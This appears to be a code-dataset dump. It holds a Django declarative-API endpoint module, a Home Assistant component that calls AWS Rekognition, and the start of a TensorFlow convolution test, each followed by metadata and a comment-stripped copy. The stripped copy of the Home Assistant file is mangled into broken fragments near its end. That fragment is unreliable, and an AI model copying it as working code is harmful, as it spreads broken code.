self._cached_resource = self.resource_model.objects.get(id=self.resource_id)
return self._cached_resource
class ResourceUpdateEndpointDefinition(ResourceEndpointDefinition):
@EndpointTask(priority=-100)
def mutate(self):
resource = self.resource
for resource_field in self.get_resource_fields():
field_value = getattr(self, resource_field.name)
if field_value is not None:
setattr(resource, resource_field.name, field_value)
@EndpointTask(priority=-101)
def validate_input(self):
resource = self.resource
expected_fields = set(
list(field.name for field in self.get_resource_fields())
+ list(field.name for field in self.get_request_fields())
)
unexpected = self.request.body_field_names - expected_fields
if unexpected:
raise errors.ClientErrorUnprocessableEntity(
"Unexpected fields: {}".format(", ".join(unexpected))
)
task = EndpointTask
deferrable_task = DeferrableEndpointTask
request_attribute = RequestAttribute
consumer_attribute = ConsumerAttribute
field = RequestField
resource_field = ResourceField
url_field = RequestUrlField
adhoc_queryset = RequestAdhocQuerySet
aggregate = Aggregate
require_one = RequireOneAttribute
require_all = RequireAllAttribute
require_all_if_any = RequireAllIfAnyAttribute
endpoint_resource = EndpointResourceAttribute
endpoint_response = EndpointResponseAttribute
| 34.671687 | 110 | 0.636391 |
import abc
import http.client
import itertools
import logging
import sys
import django
from django.conf import settings
from django.db import models
from django.http import HttpResponse
from django_declarative_apis.machinery.filtering import apply_filters_to_object
from django_declarative_apis.models import BaseConsumer
from django_declarative_apis.resources.utils import HttpStatusCode
from . import errors
from .attributes import (
Aggregate,
ConsumerAttribute,
DeferrableEndpointTask,
EndpointAttribute,
EndpointTask,
RawRequestObjectProperty,
RequestAdhocQuerySet,
RequestAttribute,
RequestField,
RequestProperty,
RequestUrlField,
RequireAllAttribute,
RequireAllIfAnyAttribute,
RequireOneAttribute,
ResourceField,
)
from .attributes import TypedEndpointAttributeMixin, RequestFieldGroup
from .utils import locate_object, rate_limit_exceeded
logger = logging.getLogger(__name__)
class EndpointResourceAttribute(EndpointAttribute):
def __init__(self, type, filter=None, returns_list=False, **kwargs):
super(EndpointResourceAttribute, self).__init__(**kwargs)
self.type = type
self.filter = filter
self.func = None
self.returns_list = returns_list
def __call__(self, func):
self.func = func
return self
def get_instance_value(self, owner_instance, owner_class):
if not owner_instance:
return self
try:
value = self.func(owner_instance)
except django.core.exceptions.ObjectDoesNotExist:
raise errors.ClientErrorNotFound(
"{0} instance not found".format(self.type.__name__)
)
if value.__class__ == dict:
return value
if not getattr(value, "_api_filter", False):
value._api_filter = self.filter
return value
class EndpointResponseAttribute(EndpointAttribute):
def __init__(self, type, filter=None, **kwargs):
super(EndpointResponseAttribute, self).__init__(**kwargs)
self.type = type
self.filter = filter
self.func = None
def __call__(self, func):
self.func = func
return self
def get_instance_value(self, owner_instance, owner_class):
if not owner_instance:
return self
value = self.func(owner_instance)
if not getattr(value, "_api_filter", False):
if self.filter:
value._api_filter = self.filter
return value
class EndpointDefinitionMeta(abc.ABCMeta, metaclass=abc.ABCMeta):
def __init__(cls, class_name, bases=None, dict=None):
super(EndpointDefinitionMeta, cls).__init__(class_name, bases, dict)
ancestor_attribs = (ancestor.__dict__.items() for ancestor in cls.mro())
for name, attribute in itertools.chain(dict.items(), *ancestor_attribs):
try:
if not attribute.name:
attribute.name = name
except AttributeError as e:
pass
class EndpointBinder(object):
class BoundEndpointManager(object):
def __init__(self, manager, bound_endpoint):
self.manager = manager
self.bound_endpoint = bound_endpoint
self.binding_exc_info = None
self.validation_exc_info = None
def get_response(self):
error = self.binding_exc_info or self.validation_exc_info
if error:
exc_type, exc_value, exc_traceback = error
if isinstance(exc_value, errors.ClientError):
logger.warning(exc_value.error_message)
else:
logger.error(str(exc_value.args) + "\n" + str(exc_traceback))
raise exc_value.with_traceback(exc_traceback)
resource = self.bound_endpoint.resource
if hasattr(resource, "is_dirty"):
if resource and resource.is_dirty(check_relationship=True):
resource.save()
endpoint_tasks = sorted(
self.manager.endpoint_tasks, key=lambda t: t.priority
)
immediate_tasks = filter(
lambda t: not isinstance(t, DeferrableEndpointTask), endpoint_tasks
)
deferred_tasks = filter(
lambda t: isinstance(t, DeferrableEndpointTask), endpoint_tasks
)
try:
for immediate_task in immediate_tasks:
immediate_task.run(self.bound_endpoint)
except errors.ClientError as ce:
if ce.save_changes and resource and resource.is_dirty():
resource.save()
raise
if hasattr(resource, "is_dirty"):
if resource and resource.is_dirty(check_relationship=True):
resource.save()
for deferred_task in deferred_tasks:
deferred_task.run(self.bound_endpoint)
if getattr(resource, "_api_filter", False):
filter_def = resource._api_filter
else:
filter_def = self.bound_endpoint.response_filter
data = self.bound_endpoint.response
status_code = self.bound_endpoint.http_status
if isinstance(data, HttpResponse):
if 200 <= status_code <= 299:
return status_code, data
else:
raise HttpStatusCode(data)
elif isinstance(data, dict):
result = {}
for key, value in data.items():
if isinstance(value, (list, tuple, models.query.QuerySet)):
result[key] = []
for item in value:
result[key].append(
apply_filters_to_object(item, filter_def)
)
else:
result[key] = value
return status_code, result
else:
return (
status_code,
apply_filters_to_object(
data,
filter_def,
self.bound_endpoint.request.META.get("HTTP_X_EXPAND"),
),
)
def __init__(self, endpoint_definition):
super(EndpointBinder, self).__init__()
self.endpoint_definition = endpoint_definition
self.endpoint_attributes = endpoint_definition.get_endpoint_attributes()
self.request_properties = endpoint_definition.get_request_properties()
self.required_request_properties = (
endpoint_definition.get_required_request_properties()
)
try:
self.consumer_attributes = endpoint_definition.get_consumer_attributes()
except AttributeError:
self.consumer_attributes = []
self.request_fields = endpoint_definition.get_request_fields()
self.required_request_fields = endpoint_definition.get_required_request_fields()
self.endpoint_tasks = endpoint_definition.get_tasks()
self.url_fields = endpoint_definition.get_url_fields()
self.adhoc_queries = endpoint_definition.get_adhoc_queries()
def create_bound_endpoint(self, manager, request, *args, **kwargs):
endpoint = self.endpoint_definition()
for url_field in self.url_fields:
if (url_field.api_name or url_field.name) in kwargs:
url_field.set_value(kwargs.get(url_field.api_name or url_field.name))
for adhoc_query_field in self.adhoc_queries:
adhoc_query_field.set_value(
{
key: val
for (key, val) in request.GET.items()
if key.startswith(adhoc_query_field.name)
}
)
RequestProperty.bind_request_to_instance(endpoint, request)
bound_endpoint_manager = EndpointBinder.BoundEndpointManager(manager, endpoint)
try:
self._bind_endpoint(endpoint)
except Exception as e:
bound_endpoint_manager.binding_exc_info = sys.exc_info()
return bound_endpoint_manager
try:
self._validate_endpoint(endpoint)
except Exception as e:
bound_endpoint_manager.validation_exc_info = sys.exc_info()
return bound_endpoint_manager
def _bind_endpoint(self, endpoint):
extra_error_message = ""
missing_required_properties = []
invalid_value_properties = []
for request_property in self.request_properties:
try:
value = getattr(endpoint, request_property.name)
if value is None and request_property.required:
if isinstance(request_property, ConsumerAttribute):
raise errors.ClientErrorForbidden()
else:
missing_required_properties.append(request_property)
except errors.ClientErrorMissingFields as mfe:
extra_error_message += mfe.error_message
except (ValueError, errors.ClientErrorInvalidFieldValues) as ve:
invalid_value_properties.append(request_property)
if missing_required_properties or extra_error_message:
raise errors.ClientErrorMissingFields(
[property.name for property in missing_required_properties],
extra_message=extra_error_message,
)
if invalid_value_properties:
raise errors.ClientErrorInvalidFieldValues(
[request_property.name for request_property in invalid_value_properties]
)
def _validate_endpoint(self, endpoint):
try:
if not (
endpoint.is_authorized()
and endpoint.is_permitted()
and endpoint.is_valid()
):
raise errors.ClientErrorForbidden(
additional_info=getattr(endpoint, "_validation_error_message", None)
)
except django.core.exceptions.ObjectDoesNotExist:
raise errors.ClientErrorNotFound()
rate_limit_key = endpoint.rate_limit_key()
if (rate_limit_key is not None) and rate_limit_exceeded(
rate_limit_key, endpoint.rate_limit_period()
):
raise errors.ClientErrorRequestThrottled()
class _EndpointRequestLifecycleManager(object):
def __init__(self, endpoint_definition):
super(_EndpointRequestLifecycleManager, self).__init__()
self.endpoint_definition = endpoint_definition
self.binder = EndpointBinder(endpoint_definition)
self.endpoint_tasks = endpoint_definition.get_tasks()
def bind_endpoint_to_request(self, request, *args, **kwargs):
return self.binder.create_bound_endpoint(self, request, *args, **kwargs)
def process_request_and_get_response(self, request, *args, **kwargs):
bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
return bound_endpoint.get_response()
def __str__(self):
return self.endpoint_definition.__name__
class BehavioralEndpointDefinitionRouter(object):
def __init__(self, *endpoint_definitions):
super(BehavioralEndpointDefinitionRouter, self).__init__()
self.endpoint_definitions = endpoint_definitions
self.endpoint_managers = [
_EndpointRequestLifecycleManager(endpoint)
for endpoint in endpoint_definitions
]
self.endpoint_manager_names = "({0})".format(
",".join(map(lambda e: e.__name__, endpoint_definitions))
)
def bind_endpoint_to_request(self, request, *args, **kwargs):
bound_endpoint = None
for candidate_endpoint_manager in self.endpoint_managers:
bound_endpoint = candidate_endpoint_manager.bind_endpoint_to_request(
request, *args, **kwargs
)
if bound_endpoint.binding_exc_info is None:
break
return bound_endpoint
def process_request_and_get_response(self, request, *args, **kwargs):
try:
bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
logger.info(
"Processing request with handler %s",
bound_endpoint.bound_endpoint.__class__.__name__,
)
return bound_endpoint.get_response()
except errors.ApiError:
raise
except Exception as e:
raise errors.ServerError() from e
def __call__(self, *args, **kwargs):
return self.process_request_and_get_response(*args, **kwargs)
def __str__(self):
return self.endpoint_manager_names
@property
def documentation(self):
return [x.documentation() for x in self.endpoint_definitions]
class EndpointDefinitionMixin(metaclass=EndpointDefinitionMeta):
pass
class BaseEndpointDefinition(metaclass=EndpointDefinitionMeta):
@abc.abstractmethod
def is_authorized(self):
return False
def is_permitted(self):
return True
def is_valid(self):
return True
def rate_limit_key(self):
return None
def rate_limit_period(self):
return 1
@property
def response_filter(self):
filter_def_name = getattr(
settings, "DECLARATIVE_ENDPOINT_DEFAULT_FILTERS", None
)
if filter_def_name:
filter_def = locate_object(filter_def_name)
else:
filter_def = {}
return filter_def
@property
def http_status(self):
return http.client.OK
@property
@abc.abstractmethod
def resource(self):
raise NotImplementedError("Endpoints must implement self.resource property")
@property
def response(self):
return self.resource
@classmethod
def get_endpoint_attributes(cls):
endpoint_attributes = filter(
lambda attribute: isinstance(attribute, EndpointAttribute),
[getattr(cls, name) for name in dir(cls)],
)
return sorted(
endpoint_attributes, key=lambda attribute: attribute.attribute_number
)
@classmethod
def get_request_properties(cls):
return list(
filter(
lambda attribute: isinstance(attribute, RequestProperty),
cls.get_endpoint_attributes(),
)
)
@classmethod
def get_required_request_properties(cls):
return list(
filter(lambda property: property.required, cls.get_request_properties())
)
@classmethod
def get_request_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestField),
cls.get_request_properties(),
)
)
@classmethod
def get_resource_fields(cls):
return list(
filter(
lambda property: isinstance(property, ResourceField),
cls.get_request_properties(),
)
)
@classmethod
def get_required_request_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestField),
cls.get_required_request_properties(),
)
)
@classmethod
def get_tasks(cls):
endpoint_tasks = filter(
lambda property: isinstance(property, EndpointTask),
cls.get_endpoint_attributes(),
)
return sorted(endpoint_tasks, key=lambda task: task.priority)
@classmethod
def get_url_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestUrlField),
cls.get_endpoint_attributes(),
)
)
@classmethod
def documentation(cls):
return {
"class_name": cls.__name__,
"fields": [p.documentation for p in cls.get_request_properties()],
}
@classmethod
def get_adhoc_queries(cls):
return [
prop
for prop in cls.get_endpoint_attributes()
if isinstance(prop, RequestAdhocQuerySet)
]
class EndpointDefinition(BaseEndpointDefinition):
request = RawRequestObjectProperty()
_consumer_type = ConsumerAttribute(field_name="type", default="RW")
is_read_only = False
def is_permitted(self):
if (
self._consumer_type is None
or self._consumer_type == BaseConsumer.TYPE_READ_WRITE
):
return True
if self._consumer_type == BaseConsumer.TYPE_READ_ONLY:
if self.is_read_only:
return True
if self.request.method == "GET":
return True
else:
self._validation_error_message = (
"Action not allowed for read-only consumer"
)
return False
return False
@classmethod
def get_consumer_attributes(cls):
return list(
filter(
lambda property: isinstance(property, ConsumerAttribute),
cls.get_request_properties(),
)
)
@classmethod
def get_consumer_type(cls):
consumer_attribute = cls.get_consumer_attributes()
if len(consumer_attribute) == 1:
consumer_attribute = consumer_attribute[0]
return consumer_attribute.name
else:
return "unknown"
@classmethod
def documentation(cls):
docs = super().documentation()
docs["consumer_type"] = cls.get_consumer_type()
return docs
class ResourceCreationMixin(object):
@property
def http_status(self):
return http.client.CREATED
class ResourceEndpointDefinition(EndpointDefinition):
consumer = RequestAttribute()
resource_id = RequestUrlField(
name="id", description="UUID of the resource to retrieve"
)
resource_model = None
def __init__(self, *args, **kwargs):
super(ResourceEndpointDefinition, self).__init__()
self._cached_resource = None
@property
def resource(self):
if not self._cached_resource:
self._cached_resource = self.resource_model.objects.get(id=self.resource_id)
return self._cached_resource
class ResourceUpdateEndpointDefinition(ResourceEndpointDefinition):
@EndpointTask(priority=-100)
def mutate(self):
resource = self.resource
for resource_field in self.get_resource_fields():
field_value = getattr(self, resource_field.name)
if field_value is not None:
setattr(resource, resource_field.name, field_value)
@EndpointTask(priority=-101)
def validate_input(self):
resource = self.resource
expected_fields = set(
list(field.name for field in self.get_resource_fields())
+ list(field.name for field in self.get_request_fields())
)
unexpected = self.request.body_field_names - expected_fields
if unexpected:
raise errors.ClientErrorUnprocessableEntity(
"Unexpected fields: {}".format(", ".join(unexpected))
)
task = EndpointTask
deferrable_task = DeferrableEndpointTask
request_attribute = RequestAttribute
consumer_attribute = ConsumerAttribute
field = RequestField
resource_field = ResourceField
url_field = RequestUrlField
adhoc_queryset = RequestAdhocQuerySet
aggregate = Aggregate
require_one = RequireOneAttribute
require_all = RequireAllAttribute
require_all_if_any = RequireAllIfAnyAttribute
endpoint_resource = EndpointResourceAttribute
endpoint_response = EndpointResponseAttribute
| true | true |
f723407e65031fd351529c33894aad8210ea47d4 | 6,590 | py | Python | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/12/23 18:08
# @Author : youqingkui
# @File : aws_rekognition.py
# @Desc :
import asyncio
import json
import logging
import os
import aiohttp
from aiohttp.hdrs import CONTENT_TYPE
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import get_component
import boto3
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'aws_rekognition'
DEPENDENCIES = ['camera']
CONF_REGION = 'region_name'
CONF_ACCESS_KEY_ID = 'aws_access_key_id'
CONF_SECRET_ACCESS_KEY = 'aws_secret_access_key'
SERVICE_CREATE_COLLECTION = 'CreateCollection '
SERVICE_LIST_COLLECTION = 'ListCollections '
SERVICE_DELETE_COLLECTION = 'DeleteCollection'
SERVICE_DETECT_FACE = 'DetectFaces'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_REGION, default="us-east-1"): cv.string,
vol.Required(CONF_ACCESS_KEY_ID): cv.string,
vol.Optional(CONF_SECRET_ACCESS_KEY): cv.string
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up microsoft face."""
entity_id = 'aws_rekognition.last_message'
_LOGGER.warning(config[DOMAIN])
face = AwsFace(hass, config[DOMAIN].get(CONF_ACCESS_KEY_ID), config[DOMAIN].get(CONF_SECRET_ACCESS_KEY),
config[DOMAIN].get(CONF_REGION), entity_id)
hass.services.register(DOMAIN, 'detect_faces', face.detect_faces)
hass.services.register(DOMAIN, 'face_person', face.async_face_person)
return True
class AwsFace(object):
def __init__(self, hass, aws_access_key_id, aws_secret_access_key, region_name, entities):
self.hass = hass
self.aws_access_key_id = aws_access_key_id
self.aws_secret_access_key = aws_secret_access_key
self.region_name = region_name
self._entities = entities
_LOGGER.warning(region_name)
self.client = boto3.client(service_name='rekognition', region_name=self.region_name,
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_access_key)
def detect_faces(self, call):
bucket = call.data.get('bucket')
fileName = call.data.get('fileName')
try:
response = self.client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
except Exception as e:
_LOGGER.error(e)
return False
_LOGGER.warning("response => %s" % response)
Labels = response.get('Labels', [])
self.hass.states.set(self._entities, Labels)
return response
@asyncio.coroutine
def async_face_person(self, call):
camera_entity = call.data['camera_entity']
camera = get_component('camera')
try:
image = yield from camera.async_get_image(self.hass, camera_entity)
response = self.client.detect_labels(
Image={
'Bytes': image,
}
)
_LOGGER.warning(response)
except Exception as e:
_LOGGER.error(e)
# def setup(hass, config):
# """Set up microsoft face."""
# entity_id = 'aws_rekognition.last_message'
#
# def face_index(call):
# bucket = call.data.get('bucket')
# fileName = call.data.get('fileName')
# response = client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
# _LOGGER.warning("face_index => %s" % response)
# hass.states.set(entity_id, 'hello aws')
#
# hass.states.set(entity_id, 'No messages')
#
# hass.services.register(DOMAIN, 'set_state', face_index)
# return True
# class AwsFace(object):
# def __init__(self, hass, region_name, timeout, entities):
# self.hass = hass
# self.websession = async_get_clientsession(hass)
# self.timeout = timeout
# self._store = {}
# self._entities = entities
#
# @property
# def store(self):
# """Store group/person data and IDs."""
# return self._store
#
# @asyncio.coroutine
# def index_faces(self, image):
# response = client.index_faces(Image={'Bytes': image})
# return response
# @asyncio.coroutine
# def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
# """Set up the Microsoft Face detection platform."""
# # api = hass.data[DATA_MICROSOFT_FACE]
# # attributes = config[CONF_ATTRIBUTES]
# attributes = 'aws_rekognition'
#
# entities = []
# for camera in config[CONF_SOURCE]:
# entities.append(AwsFaceDetectEntity(
# camera[CONF_ENTITY_ID], attributes, camera.get(CONF_NAME)
# ))
#
# async_add_devices(entities)
#
#
# class AwsFaceDetectEntity(ImageProcessingEntity):
# """Microsoft Face API entity for identify."""
#
# def __init__(self, camera_entity, attributes, name=None):
# """Initialize Microsoft Face."""
# super().__init__()
#
# self._camera = camera_entity
# self._attributes = attributes
#
# if name:
# self._name = name
# else:
# self._name = "MicrosoftFace {0}".format(
# split_entity_id(camera_entity)[1])
#
# @property
# def camera_entity(self):
# """Return camera entity id from process pictures."""
# return self._camera
#
# @property
# def name(self):
# """Return the name of the entity."""
# return self._name
#
# @asyncio.coroutine
# def async_process_image(self, image):
# """Process image.
#
# This method is a coroutine.
# """
# face_data = None
# # _LOGGER.warning("image ==> %s" % image)
# try:
# face_data = yield from client.index_faces(Image={'Bytes': image})
# _LOGGER.warning("face_data ==> %s" % face_data)
#
# except HomeAssistantError as err:
# _LOGGER.error("Can't process image on microsoft face: %s", err)
# return
#
# if face_data is None or len(face_data) < 1:
# return
#
# faces = []
# for face in face_data:
# face_attr = {}
# for attr in self._attributes:
# if attr in face['faceAttributes']:
# face_attr[attr] = face['faceAttributes'][attr]
#
# if face_attr:
# faces.append(face_attr)
#
# self.async_process_faces(faces, len(face_data))
| 30.794393 | 124 | 0.624431 |
import asyncio
import json
import logging
import os
import aiohttp
from aiohttp.hdrs import CONTENT_TYPE
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import get_component
import boto3
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'aws_rekognition'
DEPENDENCIES = ['camera']
CONF_REGION = 'region_name'
CONF_ACCESS_KEY_ID = 'aws_access_key_id'
CONF_SECRET_ACCESS_KEY = 'aws_secret_access_key'
SERVICE_CREATE_COLLECTION = 'CreateCollection '
SERVICE_LIST_COLLECTION = 'ListCollections '
SERVICE_DELETE_COLLECTION = 'DeleteCollection'
SERVICE_DETECT_FACE = 'DetectFaces'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_REGION, default="us-east-1"): cv.string,
vol.Required(CONF_ACCESS_KEY_ID): cv.string,
vol.Optional(CONF_SECRET_ACCESS_KEY): cv.string
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
entity_id = 'aws_rekognition.last_message'
_LOGGER.warning(config[DOMAIN])
face = AwsFace(hass, config[DOMAIN].get(CONF_ACCESS_KEY_ID), config[DOMAIN].get(CONF_SECRET_ACCESS_KEY),
config[DOMAIN].get(CONF_REGION), entity_id)
hass.services.register(DOMAIN, 'detect_faces', face.detect_faces)
hass.services.register(DOMAIN, 'face_person', face.async_face_person)
return True
class AwsFace(object):
def __init__(self, hass, aws_access_key_id, aws_secret_access_key, region_name, entities):
self.hass = hass
self.aws_access_key_id = aws_access_key_id
self.aws_secret_access_key = aws_secret_access_key
self.region_name = region_name
self._entities = entities
_LOGGER.warning(region_name)
self.client = boto3.client(service_name='rekognition', region_name=self.region_name,
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_access_key)
def detect_faces(self, call):
bucket = call.data.get('bucket')
fileName = call.data.get('fileName')
try:
response = self.client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
except Exception as e:
_LOGGER.error(e)
return False
_LOGGER.warning("response => %s" % response)
Labels = response.get('Labels', [])
self.hass.states.set(self._entities, Labels)
return response
@asyncio.coroutine
def async_face_person(self, call):
camera_entity = call.data['camera_entity']
camera = get_component('camera')
try:
image = yield from camera.async_get_image(self.hass, camera_entity)
response = self.client.detect_labels(
Image={
'Bytes': image,
}
)
_LOGGER.warning(response)
except Exception as e:
_LOGGER.error(e)
tine.
# """
f face_data is None or len(face_data) < 1:
# return
#
# faces = []
# for face in face_data:
# face_attr = {}
# for attr in self._attributes:
# if attr in face['faceAttributes']:
# face_attr[attr] = face['faceAttributes'][attr]
#
# if face_attr:
# faces.append(face_attr)
#
# self.async_process_faces(faces, len(face_data))
| true | true |
f7234398cdc1023b9eff0c5cac903bf989843930 | 122,502 | py | Python | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 27 | 2019-01-02T09:36:57.000Z | 2022-02-21T06:41:51.000Z | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 3 | 2019-01-23T11:01:22.000Z | 2022-02-24T02:53:31.000Z | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 11 | 2019-03-02T12:42:23.000Z | 2021-02-04T12:20:10.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for convolutional operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import convolutional
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util.compat import collections_abc
def GetShrunkInceptionShapes(shrink=10):
"""Iterator for smaller versions of convolution shapes in 2015 Inception.
Relative to inception, each depth value is `depth // shrink`.
Args:
shrink: Factor to shrink each depth value by relative to Inception.
Yields:
Tuple (input_size, filter_size, out_size, stride, padding), the convolution
parameters of Inception layers.
"""
input_sizes = [[4, 5, 5, 1248], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 2048], [4, 8, 8, 448], [4, 8, 8, 2048],
[4, 8, 8, 2048], [4, 8, 8, 2048], [4, 8, 8, 1760],
[4, 8, 8, 1760], [4, 8, 8, 1760], [4, 8, 8, 1760],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1248],
[4, 17, 17, 128], [4, 17, 17, 1248], [4, 17, 17, 224],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1216],
[4, 17, 17, 1216], [4, 17, 17, 224], [4, 17, 17, 192],
[4, 17, 17, 192], [4, 17, 17, 1152], [4, 17, 17, 1152],
[4, 17, 17, 192], [4, 17, 17, 160], [4, 17, 17, 1152],
[4, 17, 17, 1024], [4, 17, 17, 128], [4, 17, 17, 1024],
[4, 17, 17, 128], [4, 17, 17, 1024], [4, 17, 17, 128],
[4, 17, 17, 768], [4, 17, 17, 128], [4, 17, 17, 128],
[4, 17, 17, 768], [4, 17, 17, 768], [4, 35, 35, 96],
[4, 35, 35, 288], [4, 35, 35, 64], [4, 35, 35, 288],
[4, 35, 35, 256], [4, 35, 35, 48], [4, 35, 35, 256],
[4, 35, 35, 96], [4, 35, 35, 192], [4, 35, 35, 192],
[4, 35, 35, 192], [4, 73, 73, 64], [4, 73, 73, 64],
[4, 147, 147, 24]]
filter_sizes = [[1, 1, 1248, 128], [1, 3, 384, 384], [3, 1, 384, 384],
[1, 1, 2048, 192], [3, 3, 448, 384], [1, 1, 2048, 320],
[1, 1, 2048, 448], [1, 1, 2048, 384], [1, 1, 1760, 384],
[1, 1, 1760, 192], [1, 1, 1760, 448], [1, 1, 1760, 320],
[3, 3, 192, 192], [3, 3, 192, 192], [1, 1, 1248, 192],
[3, 3, 128, 320], [1, 1, 1248, 128], [1, 3, 224, 224],
[3, 1, 192, 256], [1, 3, 192, 256], [1, 1, 1216, 192],
[1, 1, 1216, 96], [3, 1, 224, 224], [3, 3, 192, 224],
[1, 3, 192, 192], [1, 1, 1152, 192], [1, 1, 1152, 128],
[3, 1, 192, 192], [3, 3, 160, 192], [1, 1, 1152, 160],
[1, 1, 1024, 128], [1, 3, 128, 192], [1, 1, 1024, 160],
[3, 1, 128, 192], [1, 1, 1024, 256], [3, 1, 128, 128],
[1, 1, 768, 192], [1, 3, 128, 128], [3, 3, 128, 128],
[1, 1, 768, 128], [1, 1, 768, 320], [3, 3, 96, 96],
[3, 3, 288, 384], [3, 3, 64, 96], [1, 1, 288, 64],
[1, 1, 256, 64], [5, 5, 48, 64], [1, 1, 256, 48],
[3, 3, 96, 96], [1, 1, 192, 32], [1, 1, 192, 64],
[1, 1, 192, 48], [3, 3, 64, 192], [1, 1, 64, 64],
[1, 1, 24, 64]]
out_sizes = [[4, 5, 5, 128], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 192], [4, 8, 8, 384], [4, 8, 8, 320],
[4, 8, 8, 448], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 192], [4, 8, 8, 448], [4, 8, 8, 320],
[4, 8, 8, 192], [4, 17, 17, 192], [4, 17, 17, 192],
[4, 8, 8, 320], [4, 17, 17, 128], [4, 17, 17, 224],
[4, 17, 17, 256], [4, 17, 17, 256], [4, 17, 17, 192],
[4, 17, 17, 96], [4, 17, 17, 224], [4, 17, 17, 224],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 128],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 160],
[4, 17, 17, 128], [4, 17, 17, 192], [4, 17, 17, 160],
[4, 17, 17, 192], [4, 17, 17, 256], [4, 17, 17, 128],
[4, 17, 17, 192], [4, 17, 17, 128], [4, 17, 17, 128],
[4, 17, 17, 128], [4, 17, 17, 320], [4, 17, 17, 96],
[4, 17, 17, 384], [4, 35, 35, 96], [4, 35, 35, 64],
[4, 35, 35, 64], [4, 35, 35, 64], [4, 35, 35, 48],
[4, 35, 35, 96], [4, 35, 35, 32], [4, 35, 35, 64],
[4, 35, 35, 48], [4, 71, 71, 192], [4, 73, 73, 64],
[4, 147, 147, 64]]
strides = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1
]
# Shrink sizes to make the test faster
for i in input_sizes:
i[3] //= shrink
for f in filter_sizes:
f[2] //= shrink
f[3] //= shrink
for o in out_sizes:
o[3] //= shrink
# pylint: disable=invalid-name
VALID = "VALID"
SAME = "SAME"
# pylint: enable=invalid-name
paddings = [
SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
VALID, SAME, SAME, VALID, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
SAME, SAME, SAME, SAME, SAME, VALID, VALID, SAME, SAME, SAME, SAME, SAME,
